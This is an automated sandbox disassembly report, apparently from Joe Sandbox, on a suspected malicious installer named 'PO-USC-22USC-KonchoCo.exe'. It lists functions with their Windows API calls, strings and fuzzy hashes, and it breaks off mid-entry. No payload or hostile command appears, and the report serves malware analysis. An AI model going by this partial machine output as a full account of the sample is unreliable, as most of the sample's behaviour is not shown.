Part of subcall function 00406172: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406198

Strings

mB, xrefs: 00406325
[Rename], xrefs: 004063B1, 004063C3
eB, xrefs: 004062F1
%ls=%ls, xrefs: 0040633D
mB, xrefs: 0040631E

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]$eB$mB$mB
API String ID: 2171350718-2529913679
Opcode ID: db523023045b127196975f0173c88122861a3a00dd6e7a8812d5311d7169504c
Instruction ID: 393dc7f902851ea198dcc63c4c4a9d42cf85fc1b4335f85fcc59b0ede2066cac
Opcode Fuzzy Hash: db523023045b127196975f0173c88122861a3a00dd6e7a8812d5311d7169504c
Instruction Fuzzy Hash: 35313571600325BBD2206B29AD49F6B3A6CDF41744F17003AF902F62D3DA7CD82686BC

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00428A60,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 9a1d1952d02a6587733a796de720c08d05f060e36ce2c67ddab1b612aed24319
Instruction ID: 3c33d73dbc2ffdf14e434cca4ae815e9cfbd561affca8d3971a90777bf4c3be5
Opcode Fuzzy Hash: 9a1d1952d02a6587733a796de720c08d05f060e36ce2c67ddab1b612aed24319
Instruction Fuzzy Hash: 34418B71800249AFCF058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB34DA55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00406930 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00406993
CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069A2
CharNextW.USER32(?,"C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069A7
CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069BA

Strings

"C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe", xrefs: 00406974
C:\Users\user\AppData\Local\Temp\, xrefs: 00406931
*?|<>/":, xrefs: 00406982

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-921906965
Opcode ID: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
Instruction ID: f71de53da442769783aaa0cb2fea73a85be5ebad64e4744dd58b15c84f46a956
Opcode Fuzzy Hash: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
Instruction Fuzzy Hash: 2211C8A580021295DB303B548D40B7766F8AF59790F56403FED96B3AC1E77C4C9282BD

Uniqueness

Uniqueness Score: -1.00%

Function 00404668 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00404685
GetSysColor.USER32(00000000), ref: 004046C3
SetTextColor.GDI32(?,00000000), ref: 004046CF
SetBkMode.GDI32(?,?), ref: 004046DB
GetSysColor.USER32(?), ref: 004046EE
SetBkColor.GDI32(?,?), ref: 004046FE
DeleteObject.GDI32(?), ref: 00404718
CreateBrushIndirect.GDI32(?), ref: 00404722

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction ID: a82f55cf926b6e885627a74f3bab1bdd796941bf972b84b6a5e459a8b365bc4c
Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction Fuzzy Hash: 5C2177715007449BC7309F78DD48B577BF4AF42715B04893DEA96A36E0D738E944CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004026F1 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1

Part of subcall function 00406253: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406269

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D

Strings

9, xrefs: 00402740

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 92e9fc4a2bdedd92fae86453cef36d5fd9ef34bcac34679d19d253eb0147ccd2
Instruction ID: 4accc3969fe2a7d0a9ccf1f8c11f2542f9fe60139f427c4dffc821b6e73cd172
Opcode Fuzzy Hash: 92e9fc4a2bdedd92fae86453cef36d5fd9ef34bcac34679d19d253eb0147ccd2
Instruction Fuzzy Hash: F3510B75D0011AABDF24AF94CA84AAEBB79FF04344F10817BE901B62D0D7B49D828B58

Uniqueness

Uniqueness Score: -1.00%

Function 00403033 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,00000000), ref: 0040304E
GetTickCount.KERNEL32 ref: 0040306C
wsprintfW.USER32 ref: 0040309A

Part of subcall function 00405707: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
Part of subcall function 00405707: lstrcatW.KERNEL32(Completed,004030AD), ref: 00405762
Part of subcall function 00405707: SetWindowTextW.USER32(Completed,Completed), ref: 00405774
Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2

CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 004030BE
ShowWindow.USER32(00000000,00000005), ref: 004030CC

Part of subcall function 00403017: MulDiv.KERNEL32(?,00000064,?), ref: 0040302C

Strings

... %d%%, xrefs: 00403094

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: c844b91f24ced077c14a758bff1a62ed25a2b151bbc768ebfdb9d0a12ed3356e
Instruction ID: 5115fc65002d889466af77c95cd87ea57bd417394e766d10746fa218fe5c3c06
Opcode Fuzzy Hash: c844b91f24ced077c14a758bff1a62ed25a2b151bbc768ebfdb9d0a12ed3356e
Instruction Fuzzy Hash: CA01C830642610E7CB31AF50AE09A6B3FACAB04706F64043BF441B11D9D6B85A51CF9D

Uniqueness

Uniqueness Score: -1.00%

Function 00404FBC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404FD7
GetMessagePos.USER32 ref: 00404FDF
ScreenToClient.USER32(?,?), ref: 00404FF9
SendMessageW.USER32(?,00001111,00000000,?), ref: 0040500B
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00405031

Strings

f, xrefs: 0040500D

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction ID: f32abc49a7be06d84d864a503b70a66925f192d82b82ee1d40ead4c3c6165fb8
Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction Fuzzy Hash: 79015E31900218BADB00DBA4DD85BFFBBBCEF55711F10412BBA51B61D0D7B4AA058BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402F98 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
wsprintfW.USER32 ref: 00402FEA
SetWindowTextW.USER32(?,?), ref: 00402FFA
SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300C

Strings

unpacking data: %d%%, xrefs: 00402FD8, 00402FE8
verifying installer: %d%%, xrefs: 00402FDF

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: 66e00694bf9c2fcf5817c91216ca696d61ea9415c1ed8b1f40767934bfa15992
Instruction ID: 34bde3d48a8f942e304b41271f5ed33cd318c4bcfffe3c394610842cbdf8d478
Opcode Fuzzy Hash: 66e00694bf9c2fcf5817c91216ca696d61ea9415c1ed8b1f40767934bfa15992
Instruction Fuzzy Hash: 10F0317054020CABEF249F60DD4ABEE3B68EB40349F00C03AF606B51D0DBB99A55DB99

Uniqueness

Uniqueness Score: -1.00%

Function 00402955 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
GlobalFree.KERNEL32(?), ref: 00402A0B
GlobalFree.KERNEL32(00000000), ref: 00402A1E
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 99a72b25e835b2ea7940c93163da3ca2f710589d23dcac0e6d207047e8163098
Instruction ID: 0665ed67c6e74a6a0a4f3ff5189880cf350c83190f31c90c7548f1ee6fedf688
Opcode Fuzzy Hash: 99a72b25e835b2ea7940c93163da3ca2f710589d23dcac0e6d207047e8163098
Instruction Fuzzy Hash: 5731CF71D00124BBCF21AFA5CD89D9E7EB9AF48364F10023AF511762E1CB794C429B98

Uniqueness

Uniqueness Score: -1.00%

Function 00404EAE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00422F48,00422F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F4F
wsprintfW.USER32 ref: 00404F58
SetDlgItemTextW.USER32(?,00422F48), ref: 00404F6B

Strings

H/B, xrefs: 00404F41
%u.%u%s%s, xrefs: 00404F39

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$H/B
API String ID: 3540041739-2222257793
Opcode ID: 701484786e9e788ccce1f8e608fe17be4446b7c9895a13b6126df495f4584910
Instruction ID: 614c6b03a1206c52a907a8f7c7d2435543e043070c0789599254521b237785a9
Opcode Fuzzy Hash: 701484786e9e788ccce1f8e608fe17be4446b7c9895a13b6126df495f4584910
Instruction Fuzzy Hash: D911D5336041287BDB00666D9C45E9E329CEB85374F254637FA25F31D1EA79C82282E8

Uniqueness

Uniqueness Score: -1.00%

Function 00402EAE Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: b11fc5b6ae31e3f7bcdb9db3b4e616a20ad73eae00ded2b204568f86272eb2db
Instruction ID: 09cb529ade84319239dc5b50ebc61ba38ec7146c59f77be9acf979a475766563
Opcode Fuzzy Hash: b11fc5b6ae31e3f7bcdb9db3b4e616a20ad73eae00ded2b204568f86272eb2db
Instruction Fuzzy Hash: FD218B7150011ABFDF119F90CE89EEF7B7DEB10388F100076B949B11E0D7B48E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 00401D86 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D9F
GetClientRect.USER32(?,?), ref: 00401DEA
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
DeleteObject.GDI32(00000000), ref: 00401E3E

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
